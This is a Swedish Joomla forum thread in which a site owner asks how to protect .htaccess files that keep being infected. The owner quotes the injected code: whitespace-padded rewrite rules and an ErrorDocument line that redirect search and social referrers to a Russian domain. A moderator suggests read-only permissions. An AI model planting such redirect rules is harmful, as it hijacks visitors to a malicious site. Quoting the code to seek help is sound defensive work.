Hur skyddar jag .htaccess-filerna?

Diskutera frågor rörande installation, backup, migrering och säkerhet avseende Joomla! 1.5.
Locked
User avatar
apelsinskal
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 169
Joined: Tue Jan 15, 2008 7:13 am
Location: Jönköping, Sweden
Contact:

Hur skyddar jag .htaccess-filerna?

Post by apelsinskal » Tue Aug 07, 2012 10:30 am

Hej alla! Jag har fått problem med mina .htaccess-filer. Jag får in skräp gång på gång.
Har bytt ut dem mot de rekommenderade .htaccessfilerna för att se om det hjälper, men det gjorde det inte.
Så hur skyddar jag dem på bästa sätt, så jag inte får in skräp i dem hela tiden? :'(
Ja jag vet att det finns 1000 sidor om detta men jag vet inte vilket sätt som är bäst.

Detta får jag längst upp i .htaccess-filen:

Code: Select all

<IfModule mod_rewrite.c>																														
																														RewriteEngine On																														
																														RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|[youtube]|wikipedia|excite|altavista|msn|netscape|aol|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|linkedin|flickr|liveinternet|filesearch|yell|openstat|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv|infospace)\.(.*)																														
																														RewriteRule ^(.*)$ http://1-fitnes.ru/liwemoly?5 [R=301,L]																														
																														RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)																														
																														RewriteRule ^(.*)$ http://1-fitnes.ru/liwemoly?5 [R=301,L]																														
																														</IfModule>	
Och detta längst ner:

Code: Select all

ErrorDocument 500 http://1-fitnes.ru/liwemoly?5
Jag har två domäner som är påverkade (på samma wehotell/konto) med flera underdomäner. Alla får samma kod.

User avatar
Zello
Joomla! Virtuoso
Joomla! Virtuoso
Posts: 3869
Joined: Wed Jan 10, 2007 11:23 am
Location: Västerås - Sweden

Re: Hur skyddar jag .htaccess-filerna?

Post by Zello » Tue Aug 07, 2012 2:08 pm

Prova att sätta filrättigheten till 444
Olle Zettergren
Freelance Senior Joomla developer
Moderator Swedish forum


Locked

Return to “Installation, backup och säkerhet”